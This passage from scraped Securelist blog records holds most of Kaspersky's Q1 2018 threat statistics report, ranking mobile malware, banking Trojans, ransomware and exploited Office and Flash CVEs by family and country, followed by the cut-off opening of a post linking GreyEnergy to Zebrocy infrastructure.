1.48 \n15 | Trojan.AndroidOS.Piom.qmx | 1.47 \n16 | Trojan.AndroidOS.Dvmap.a | 1.40 \n17 | Trojan-SMS.AndroidOS.Agent.xk | 1.35 \n18 | Trojan.AndroidOS.Triada.snt | 1.24 \n19 | Trojan-Dropper.AndroidOS.Lezok.b | 1.22 \n20 | Trojan-Dropper.AndroidOS.Tiny.d | 1.22 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked._\n\nAs before, first place in our TOP 20 went to DangerousObject.Multi.Generic (70.17%), the verdict we use for malware detected [using cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). Cloud technologies work when the anti-virus databases lack data for detecting a piece of malware, but the cloud of the anti-virus company already contains information about the object. This is basically how the latest malicious programs are detected.\n\nIn second place was Trojan.AndroidOS.Boogr.gsh (12.92%). This verdict is given to files recognized as malicious by our system based on [machine learning](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).\n\nThird was Trojan.AndroidOS.Agent.rx (5.55%). Operating in background mode, this Trojan's task is to covertly visit web pages as instructed by its C&C.\n\nFourth and fifth places went to the Trojan _matryoshkas_ Trojan-Dropper.AndroidOS.Lezok.p (5.2%) and Trojan-Dropper.AndroidOS.Hqwar.ba (2.95%), respectively. Note that in Q1 threats like Trojan-Dropper effectively owned the TOP 20, occupying eight positions in the rating. The main tasks of such droppers are to drop a payload on the victim, avoid detection by security software, and complicate the reverse engineering process. In the case of Lezok, an aggressive advertising app acts as the payload, while Hqwar can conceal a banking Trojan or ransomware.\n\nSixth place in the rating was taken by the unusual Trojan Triada.dl (2.94%) from the [Trojan.AndroidOS.Triada](<https://threats.kaspersky.com/en/threat/Trojan.AndroidOS.Triada/>) family of modular-designed malware, which we have written about many times. The Trojan was notable for its highly sophisticated attack vector: it modified the main system library libandroid_runtime.so so that malicious code started when any debugging output was written to the system event log. Devices with the modified library ended up on store shelves, thus ensuring that the infection began early. The capabilities of Triada.dl are almost limitless: it can be embedded in apps already installed and pinch data from them, and it can show the user fake data in \"clean\" apps.\n\nThe Trojan ransomware Trojan-Trojan-Ransom.AndroidOS.Zebt.a (1.48%) finished 14th. It features a quaint set of functions, including hiding the icon at startup and requesting device administrator rights to counteract deletion. Like other such mobile ransomware, the malware is distributed under the guise of a porn app.\n\nAnother interesting resident in the TOP 20 is Trojan-SMS.AndroidOS.Agent.xk (1.35%), which operates like the SMS Trojans of 2011. The malware displays a welcome screen offering various services, generally access to content. At the bottom in fine print it is written that the services are fee-based and subscription to them is via SMS.\n\n#### Geography of mobile threats\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171253/180511-it-threats-q1-18-statistics-6.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171253/180511-it-threats-q1-18-statistics-6.png>)\n\n_Map of attempted infections using mobile malware in Q1 2018 (percentage of attacked users in the country)_\n\nTOP 10 countries by share of users attacked by mobile malware:\n\n | Country* | %** \n---|---|--- \n1 | China | 34.43 \n2 | Bangladesh | 27.53 \n3 | Nepal | 27.37 \n4 | Ivory Coast | 27.16 \n5 | Nigeria | 25.36 \n6 | Algeria | 24.13 \n7 | Tanzania | 23.61 \n8 | India | 23.27 \n9 | Indonesia | 22.01 \n10 | Kenya | 21.45 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000). \n** Unique users attacked in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nIn Q1 2018, China (34.43%) topped the list by share of mobile users attacked. Note that China is a regular fixture in the TOP 10 rating by number of attacked users: It came sixth in 2017, and fourth in 2016. As in 2017, second place was claimed by Bangladesh (27.53%). The biggest climber was Nepal (27.37%), rising from ninth place last year to third.\n\nRussia (8.18%) this quarter was down in 39th spot, behind Qatar (8.22%) and Vietnam (8.48%).\n\nThe safest countries (based on proportion of mobile users attacked) are Denmark (1.85%) and Japan (1%).\n\n#### Mobile banking Trojans\n\nIn the reporting period, we detected **18,912** installation packages for mobile banking Trojans, which is 1.3 times more than in Q4 2017.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171304/180511-it-threats-q1-18-statistics-7.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171304/180511-it-threats-q1-18-statistics-7.png>)\n\n_Number of installation packages for mobile banking Trojans detected by Kaspersky Lab, Q2 2017 \u2013 Q1 2018_\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Asacub.bj | 12.36 \n2 | Trojan-Banker.AndroidOS.Svpeng.q | 9.17 \n3 | Trojan-Banker.AndroidOS.Asacub.bk | 7.82 \n4 | Trojan-Banker.AndroidOS.Svpeng.aj | 6.63 \n5 | Trojan-Banker.AndroidOS.Asacub.e | 5.93 \n6 | Trojan-Banker.AndroidOS.Hqwar.t | 5.38 \n7 | Trojan-Banker.AndroidOS.Faketoken.z | 5.15 \n8 | Trojan-Banker.AndroidOS.Svpeng.ai | 4.54 \n9 | Trojan-Banker.AndroidOS.Agent.di | 4.31 \n10 | Trojan-Banker.AndroidOS.Asacub.ar | 3.52 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked by banking threats._\n\nThe most popular mobile banking Trojan in Q1 was Asacub.bj (12.36%), nudging ahead of second-place Svpeng.q (9.17%). Both these Trojans use phishing windows to steal bank card and authentication data for online banking. They also steal money through SMS services, including mobile banking.\n\nNote that the TOP 10 mobile banking threats in Q1 is largely made up of members of the Asacub (4 out of 10) and Svpeng (3 out of 10) families. However, Trojan-Banker.AndroidOS.Faketoken.z also entered the list. This Trojan has extensive spy capabilities: it can install other apps, intercept incoming messages (or create them on command), make calls and USSD requests, and, of course, open links to phishing pages.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171313/180511-it-threats-q1-18-statistics-8.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171313/180511-it-threats-q1-18-statistics-8.png>)\n\n_Geography of mobile banking threats in Q1 2018 (percentage of attacked users)_\n\n**TOP 10 countries by share of users attacked by mobile banking Trojans**\n\n | Country* | %** \n---|---|--- \n1 | Russia | 0.74 \n2 | USA | 0.65 \n3 | Tajikistan | 0.31 \n4 | Uzbekistan | 0.30 \n5 | China | 0.26 \n6 | Turkey | 0.22 \n7 | Ukraine | 0.22 \n8 | Kazakhstan | 0.22 \n9 | Poland | 0.17 \n10 | Moldova | 0.16 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000). \n** Unique users attacked by mobile banking Trojans in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in this country._\n\nThe Q1 2018 rating was much the same as the situation observed throughout 2017: Russia (0.74%) remained top.\n\nThe US (0.65%) and Tajikistan (0.31%) took silver and bronze, respectively. The most popular mobile banking Trojans in these countries were various modifications of the [Trojan-Banker.AndroidOS.Svpeng](<https://securelist.com/latest-version-of-svpeng-targets-users-in-us/63746/>) family, as well Trojan-Banker.AndroidOS.Faketoken.z.\n\n#### Mobile ransomware Trojans\n\nIn Q1 2018, we detected **8,787** installation packages for mobile ransomware Trojans, which is just over half the amount seen in the previous quarter and 22 times less than in Q2 2017. This significant drop is largely because attackers began to make more use of droppers in an attempt to hinder detection and hide the payload. As a result, such malware is detected as a dropper (for example, from the Trojan-Dropper.AndroidOS.Hqwar family), even though it may contain mobile ransomware or a \"banker.\"\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171322/180511-it-threats-q1-18-statistics-9.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171322/180511-it-threats-q1-18-statistics-9.png>)\n\n_Number of installation packages for mobile ransomware Trojans detected by Kaspersky Lab (Q2 2017 \u2013 Q1 2018)_\n\nNote that despite the decline in their total number, ransomware Trojans remain a serious threat \u2014 technically they are now far more advanced and dangerous. For instance, Trojan-Trojan-Ransom.AndroidOS.Svpeng acquires device administrator rights and locks the smartphone screen with a PIN if an attempt is made to remove them. If no PIN is set (could also be a graphic, numeric, or biometric lock), the device is locked. In this case, the only way to restore the smartphone to working order is to reset the factory settings.\n\nThe most widespread mobile ransomware in Q1 was Trojan-Ransom.AndroidOS.Zebt.a \u2014 it was encountered by more than half of all users. In second place was Trojan-Ransom.AndroidOS.Fusob.h, having held pole position for a long time. The once popular Trojan-Ransom.AndroidOS.Svpeng.ab only managed fifth place, behind Trojan-Ransom.AndroidOS.Egat.d and Trojan-Ransom.AndroidOS.Small.snt. Incidentally, Egat.d is a pared-down version of Zebt.a, both have the same creators.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171331/180511-it-threats-q1-18-statistics-10.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171331/180511-it-threats-q1-18-statistics-10.png>)\n\n_Geography of mobile ransomware Trojans in Q1 2018 (percentage of attacked users)_\n\nTOP 10 countries by share of users attacked by mobile ransomware Trojans:\n\n | Country* | %** \n---|---|--- \n1 | Kazakhstan | 0.99 \n2 | Italy | 0.64 \n3 | Ireland | 0.63 \n4 | Poland | 0.61 \n5 | Belgium | 0.56 \n6 | Austria | 0.38 \n7 | Romania | 0.37 \n8 | Hungary | 0.34 \n9 | Germany | 0.33 \n10 | Switzerland | 0.29 \n \n_* Excluded from the rating are countries where the number of users of Kaspersky Lab's mobile antivirus is relatively small (fewer than 10,000) \n** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nFirst place in the TOP 10 again went to Kazakhstan (0.99%); the most active family in this country was Trojan-Ransom.AndroidOS.Small. Second came Italy (0.64%), where most attacks were the work of Trojan-Ransom.AndroidOS.Zebt.a, which is also the most popular mobile ransomware in third-place Ireland (0.63%).\n\n## Vulnerable apps used by cybercriminals\n\nIn Q1 2018, we observed some major changes in the distribution of exploits launched against users. The share of Microsoft Office exploits (47.15%) more than doubled compared with the average for 2017. This is also twice the quarterly score of the permanent leader in recent years \u2014 browser exploits (23.47%). The reason behind the sharp increase is clear: over the past year, so many different vulnerabilities have been found and exploited in Office applications, that it can only be compared to amount of Adobe Flash vulnerabilities found in the past. But lately the share of Flash exploits has been decreasing (2.57% in Q1), since Adobe and Microsoft are doing all they can to hinder the exploitation of Flash Player.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171341/180511-it-threats-q1-18-statistics-11.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171341/180511-it-threats-q1-18-statistics-11.png>)\n\n_Distribution of exploits used in attacks by type of application attacked, Q1 2018_\n\nThe most frequently used vulnerability in Microsoft Office in Q1 was [CVE-2017-11882](<https://threats.kaspersky.com/en/vulnerability/KLA11139/>) \u2014 a stack overflow-type vulnerability in Equation Editor, a rather old component in the Office suite. Attacks using this vulnerability make up approximately one-sixth of all exploit-based attacks. This is presumably because CVE-2017-11882 exploitation is fairly reliable. Plus, the bytecode processed by Equation Editor allows the use of various obfuscations, which increases the chances of bypassing the protection and launching a successful attack (Kaspersky Lab's Equation file format parser easily handles all currently known obfuscations). Another vulnerability found in Equation Editor this quarter was CVE-2018-0802. It too is exploited, but less actively. The following exploits for logical vulnerabilities in Office found in 2017 were also encountered: CVE-2017-8570, CVE-2017-8759, CVE-2017-0199. But even their combined number of attacks does not rival CVE-2017-11882.\n\nAs for zero-day exploits in Q1, CVE-2018-4878 was reported by a South Korean CERT and several other sources in late January. This is an Adobe Flash vulnerability originally used in targeted attacks (supposedly by the Scarcruft group). At the end of the quarter, an exploit for it appeared in the widespread GreenFlash Sundown, Magnitude, and RIG exploit kits. In targeted attacks, a Flash object with the exploit was embedded in a Word document, while exploit kits distribute it via web pages.\n\nLarge-scale use of network exploits using vulnerabilities patched by the MS17-010 update (those that exploited [EternalBlue](<https://threats.kaspersky.com/en/vulnerability/KLA10977/>) and other vulnerabilities from the Shadow Brokers leak) also continued throughout the quarter. MS17-010 exploits account for more than 25% of all network attacks that we registered.\n\n## Malicious programs online (attacks via web resources)\n\n_The statistics in this chapter are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected. _\n\n### **Online threats in the financial sector**\n\n#### Q1 events\n\nIn early 2018, the owners of the Trojan Dridex were particularly active. Throughout its years-long existence, this malware has acquired a solid infrastructure. Today, its main line of activity is compromising credentials for online banking services with subsequent theft of funds from bank accounts. Its accomplice is fellow banking Trojan Emotet. Discovered in 2014, this malware also belongs to a new breed of banking Trojans developed from scratch. However, it was located on the same network infrastructure as Dridex, suggesting a close link between the two families. But now Emotet has lost its banking functions and is used by attackers as a spam bot and loader with Dridex as the payload. Early this year, it was reported that the encryptor BitPaymer (discovered last year) was developed by the same group behind [Dridex](<https://securelist.com/dridex-a-history-of-evolution/78531/>). As a result, the malware was rebranded FriedEx.\n\nQ1 saw the arrest of the head of the criminal group responsible for the Carbanak and Cobalt malware attacks, it was [reported by Europol](<https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain>). Starting in 2013, the criminal group attacked more than 40 organizations, causing damage to the financial industry estimated at more than EUR 1 billion. The main attack vector was to penetrate the target organization's network by sending employees spear-phishing messages with malicious attachments. Having penetrated the internal network via the infected computers, the cybercriminals gained access to the ATM control servers, and through them to the ATMs themselves. Access to the infrastructure, servers, and ATMs allowed the cybercriminals to dispense cash without the use of bank cards, transfer money from the organisation to criminal accounts, and inflate bank balances with money mules being used to collect the proceeds.\n\n#### Financial threat statistics\n\n_These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data. As of Q1 2017, the statistics include malicious programs for ATMs and POS terminals, but do not include mobile threats._\n\nIn Q1 2018, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs designed to steal money from bank accounts on the computers of 204,448 users.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171350/180511-it-threats-q1-18-statistics-12.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171350/180511-it-threats-q1-18-statistics-12.png>)\n\n_Number of unique users attacked by financial malware, Q1 2018_\n\n##### Geography of attacks\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky Lab products that faced this threat during the reporting period out of all users of our products in that country.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171359/180511-it-threats-q1-18-statistics-13.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171359/180511-it-threats-q1-18-statistics-13.png>)\n\n \n**_Geography of banking malware attacks in Q1 2018 (percentage of attacked users)_**\n\n**TOP 10 countries by percentage of attacked users**\n\n| **Country*** | **% of users attacked**** \n---|---|--- \n1 | Cameroon | 2.1 \n2 | Germany | 1.7 \n3 | South Korea | 1.5 \n4 | Libya | 1.5 \n5 | Togo | 1.5 \n6 | Armenia | 1.4 \n7 | Georgia | 1.4 \n8 | Moldova | 1.2 \n9 | Kyrgyzstan | 1.2 \n10 | Indonesia | 1.1 \n \n_These statistics are based on Anti-Virus detection verdicts received from users of Kaspersky Lab products who consented to provide statistical data. \nExcluded are countries with relatively few Kaspersky Lab' product users (under 10,000). \n** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky Lab products in the country._\n\n#### TOP 10 banking malware families\n\n**TOP 10 malware families used to attack online banking users in Q1 2018 (by share of attacked users):**\n\n| **Name** | **Verdicts*** | **% of attacked users**** \n---|---|---|--- \n1 | Zbot | Trojan.Win32. Zbot | 28.0% | \n2 | Nymaim | Trojan.Win32. Nymaim | 20.3% | \n3 | Caphaw | Backdoor.Win32. Caphaw | 15.2% | \n4 | SpyEye | Backdoor.Win32. SpyEye | 11.9% | \n5 | NeutrinoPOS | Trojan-Banker.Win32.NeutrinoPOS | 4.5% | \n6 | Emotet | Backdoor.Win32. Emotet | 2.4% | \n7 | Neurevt | Trojan.Win32. Neurevt | 2.3% | \n8 | Shiz | Backdoor.Win32. Shiz | 2.1% | \n9 | Gozi | Trojan.Win32. Gozi | 1.9% | \n10 | ZAccess | Backdoor.Win32. ZAccess | 1.3% | \n \n_* Detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data.__ \n** Unique users attacked by this malware as a percentage of all users attacked by financial malware._\n\nIn Q1 2018, TrickBot departed the rating to be replaced by Emotet (2.4%), also known as _Heodo_. Trojan.Win32.Zbot (28%) and Trojan.Win32.Nymaim (20.3%) remain in the lead, while Trojan.Win32.Neurevt (2.3%), also known as Betabot, suffered a major slide. Meanwhile, Caphaw (15.2%) and NeutrinoPOS (4.5%) climbed significantly, as did their Q1 activity.\n\n### Cryptoware programs\n\n#### Q1 events\n\nQ1 2018 passed without major incidents or mass cryptoware epidemics. The highlight was perhaps the emergence and widespread occurrence of a new Trojan called [GandCrab](<https://threatpost.com/tag/gandcrab-ransomware/>). Notable features of the malware include:\n\n * Use of C&C servers in the .bit domain zone (this top-level domain is supported by an alternative decentralized DNS system based on Namecoin technology)\n * Ransom demand in the cryptocurrency Dash\n\nGandCrab was first detected in January. The cybercriminals behind it used spam emails and exploit kits to deliver the cryptoware to victim computers.\n\nThe RaaS (ransomware as a service) distribution model continues to attract malware developers. In February, for example, there appeared a new piece of ransomware called [Data Keeper](<https://securelist.ru/data-keeper-ransomware/88883/>), able to be distributed by any cybercriminal who so desired. Via a special resource on the Tor network, the creators of Data Keeper made it possible to generate executable files of the Trojan for subsequent distribution by \"affilate program\" participants. A dangerous feature of this malware is its ability to automatically propagate inside a local network. Despite this, Data Keeper did not achieve widespread distribution in Q1.\n\nOne notable success in the fight against cryptoware came from Europe: with the assistance of Kaspersky Lab, Belgian police [managed to locate and confiscate](<https://www.europol.europa.eu/newsroom/news/no-more-ransom-update-belgian-federal-police-releases-free-decryption-keys-for-cryakl-ransomware>) a server used by the masterminds behind the Trojan Cryakl. Following the operation, [Kaspersky Lab was given](<https://www.kaspersky.com/about/press-releases/2018_no-more-ransom-update>) several private RSA keys required to decrypt files encrypted with certain versions of the Trojan. As a result, we were able to develop a [tool](<https://support.kaspersky.com/viruses/disinfection/10556>) to assist victims.\n\n#### Number of new modifications\n\nIn Q1 2018, there appeared several new cryptors, but only one, GandCrab, was assigned a new family in our classification. The rest, which are not widely spread, continue to be detected with generic verdicts.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171409/180511-it-threats-q1-18-statistics-14.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171409/180511-it-threats-q1-18-statistics-14.png>)\n\n_Number of new cryptoware modifications, Q2 2017 \u2013 Q1 2018_\n\nThe number of new modifications fell sharply against previous quarters. The trend indicates that cybercriminals using this type of malware are becoming less active.\n\n#### Number of users attacked by Trojan cryptors\n\nDuring the reporting period, Kaspersky Lab products blocked cryptoware attacks on the computers of 179,934 unique users. Despite fewer new Trojan modifications, the number of attacked users did not fall against Q3.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171418/180511-it-threats-q1-18-statistics-15.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171418/180511-it-threats-q1-18-statistics-15.png>)\n\n_Number of unique users attacked by cryptors, Q1 2018_\n\n#### Geography of attacks\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171429/180511-it-threats-q1-18-statistics-16.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171429/180511-it-threats-q1-18-statistics-16.png>)\n\n**TOP 10 countries attacked by Trojan cryptors**\n\n| **Country*** | **% of users attacked by cryptors**** \n---|---|--- \n1 | Uzbekistan | 1.12 \n2 | Angola | 1.11 \n3 | Vietnam | 1.04 \n4 | Venezuela | 0.95 \n5 | Indonesia | 0.95 \n6 | Pakistan | 0.93 \n7 | China | 0.87 \n8 | Azerbaijan | 0.75 \n9 | Bangladesh | 0.70 \n10 | Mongolia | 0.64 \n \n_* Excluded are countries with relatively few Kaspersky Lab users (under 50,000). \n** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in the country._\n\nThe makeup of the rating differs markedly from 2017. That said, most positions were again filled by Asian countries, while Europe did not have a single representative in the TOP 10 countries attacked by cryptors.\n\nDespite not making the TOP 10 last year, Uzbekistan (1.12%) and Angola (1.11%) came first and second. Vietnam (1.04%) moved from second to third, Indonesia (0.95%) from third to fifth, and China (0.87%) from fifth to seventh, while Venezuela (0.95%) climbed from eighth to fourth.\n\n**TOP 10 most widespread cryptor families**\n\n| **Name** | **Verdicts*** | **% of attacked users**** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 38.33 | \n2 | PolyRansom/VirLock | Virus.Win32.PolyRansom | 4.07 | \n3 | Cerber | Trojan-Ransom.Win32.Zerber | 4.06 | \n4 | Cryakl | Trojan-Ransom.Win32.Cryakl | 2.99 | \n5 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 2.77 | \n6 | Shade | Trojan-Ransom.Win32.Shade | 2.61 | \n7 | Purgen/GlobeImposter | Trojan-Ransom.Win32.Purgen | 1.64 | \n8 | Crysis | Trojan-Ransom.Win32.Crusis | 1.62 | \n9 | Locky | Trojan-Ransom.Win32.Locky | 1.23 | \n10 | (generic verdict) | Trojan-Ransom.Win32.Gen | 1.15 | \n| | | | | \n \n_* Statistics are based on detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data. \n** Unique Kaspersky Lab users attacked by a particular family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors._\n\nThis quarter, the rating is again topped by WannaCry (38.33%), extending its already impressive lead. Second place was claimed by PolyRansom (4.07%), also known as VirLock, a worm that's been around for a while. This malware substitutes user files with modified instances of its own body, and places victim data inside these copies in an encrypted format. Statistics show that a new modification detected in December immediately began to attack user computers.\n\nThe remaining TOP 10 positions are taken by Trojans already known from previous reports: Cerber, Cryakl, Purgen, Crysis, Locky, and Shade.\n\n### Countries that are sources of web-based attacks: TOP 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky Lab products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q1 2018, Kaspersky Lab solutions blocked **796,806,112 **attacks launched from Internet resources located in 194 countries worldwide. **282,807,433** unique URLs were recognized as malicious by Web Anti-Virus components. These indicators are significantly higher than in previous quarters. This is largely explained by the large number of triggers in response to attempts to download web miners, which came to prominence towards the end of last year and continue to outweigh other web threats.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171439/180511-it-threats-q1-18-statistics-17.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171439/180511-it-threats-q1-18-statistics-17.png>)\n\n_Distribution of web attack sources by country, Q1 2018_\n\nThis quarter, Web Anti-Virus was most active on resources located in the US (39.14%). Canada, China, Ireland, and Ukraine dropped out of TOP 10 to be replaced by Luxembourg (1.33%), Israel (0.99%), Sweden (0.96%), and Singapore (0.91%).\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Belarus | 40.90 \n2 | Ukraine | 40.32 \n3 | Algeria | 39.69 \n4 | Albania | 37.33 \n5 | Moldova | 37.17 \n6 | Greece | 36.83 \n7 | Armenia | 36.78 \n8 | Azerbaijan | 35.13 \n9 | Kazakhstan | 34.64 \n10 | Russia | 34.56 \n11 | Kyrgyzstan | 33.77 \n12 | Venezuela | 33.10 \n13 | Uzbekistan | 31.52 \n14 | Georgia | 31.40 \n15 | Latvia | 29.85 \n16 | Tunisia | 29.77 \n17 | Romania | 29.09 \n18 | Qatar | 28.71 \n19 | Vietnam | 28.66 \n20 | Serbia | 28.55 \n \n_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky Lab products who consented to provide statistical data._ \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000). \n** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 23.69% of Internet user computers worldwide experienced at least one **Malware-class** attack.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171448/180511-it-threats-q1-18-statistics-18.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171448/180511-it-threats-q1-18-statistics-18.png>)\n\n_Geography of malicious web attacks in Q1 2018 (percentage of attacked users)_\n\nThe countries with the safest surfing environments included Iran (9.06%), Singapore (8.94%), Puerto Rico (6.67%), Niger (5.14%), and Cuba (4.44%).\n\n## Local threats\n\n_Local infection statistics for user computers are a very important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.). _\n\n_Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media._\n\nIn Q1 2018, our File Anti-Virus detected **187,597,494** malicious and potentially unwanted objects.\n\n**Countries where users faced the highest risk of local infection**\n\nFor each country, we calculated the percentage of Kaspersky Lab product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nThe rating includes only **Malware-class** attacks. It does not include File Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Uzbekistan | 57.03 \n2 | Afghanistan | 56.02 \n3 | Yemen | 54.99 \n4 | Tajikistan | 53.08 \n5 | Algeria | 49.07 \n6 | Turkmenistan | 48.68 \n7 | Ethiopia | 48.21 \n8 | Mongolia | 46.84 \n9 | Kyrgyzstan | 46.53 \n10 | Sudan | 46.44 \n11 | Vietnam | 46.38 \n12 | Syria | 46.12 \n13 | Rwanda | 46.09 \n14 | Laos | 45.66 \n15 | Libya | 45.50 \n16 | Djibouti | 44.96 \n17 | Iraq | 44.65 \n18 | Mauritania | 44.55 \n19 | Kazakhstan | 44.19 \n20 | Bangladesh | 44.15 \n \n_These statistics are based on detection verdicts returned by OAS and ODS Anti-Virus modules received from users of Kaspersky Lab products who consented to provide statistical data. The data include detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera and phone memory cards, or external hard drives._ \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000). \n_** _Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 23.39% of computers globally faced at least one **Malware-class** local threat in Q1.\n\nThe figure for Russia was 30.92%.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171457/180511-it-threats-q1-18-statistics-19.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171457/180511-it-threats-q1-18-statistics-19.png>)\n\n**The safest countries in terms of infection risk included** Estonia (15.86%), Singapore (11.97%), New Zealand (9.24%), Czech Republic (7.89%), Ireland (6.86%), and Japan (5.79%).", "cvss3": {}, "published": "2018-05-14T10:00:30", "type": "securelist", "title": "IT threat evolution Q1 2018. Statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2018-4878"], "modified": "2018-05-14T10:00:30", "id": "SECURELIST:D7795824A5A02E1E45E51294D78CEBC2", "href": "https://securelist.com/it-threat-evolution-q1-2018-statistics/85541/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-24T16:53:08", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/12/05121854/Abstract-technology-990x400.jpeg)\n\nIn October 2018, ESET published a[ report](<https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf>) describing a set of activity they called GreyEnergy, which is believed to be a successor to BlackEnergy group. BlackEnergy (a.k.a. Sandworm) is best known, among other things, for having been involved in attacks against Ukrainian energy facilities in 2015, which led to power outages. Like its predecessor, GreyEnergy malware has been detected attacking industrial and ICS targets, mainly in Ukraine.\n\n[Kaspersky Lab ICS CERT](<https://ics-cert.kaspersky.com/>) has identified an overlap between GreyEnergy and a Sofacy subset called [\"Zebrocy\"](<https://securelist.com/a-slice-of-2017-sofacy-activity/83930/>). The Zebrocy activity was named after malware that Sofacy group began to use since mid-November 2015 for the post-exploitation stage of attacks on its victims. Zebrocy's targets are widely spread across the Middle East, Europe and Asia and the targets' profiles are mostly government-related.\n\nBoth sets of activity used the same servers at the same time and targeted the same organization.\n\n## **Details**\n\n### **Servers**\n\nIn our private APT Intel report from July 2018 \"Zebrocy implements new VBA anti-sandboxing tricks\", details were provided about different Zebrocy C2 servers, including **193.23.181[.]151**.\n\nIn the course of our research, the following Zebrocy samples were found to use the same server to download additional components 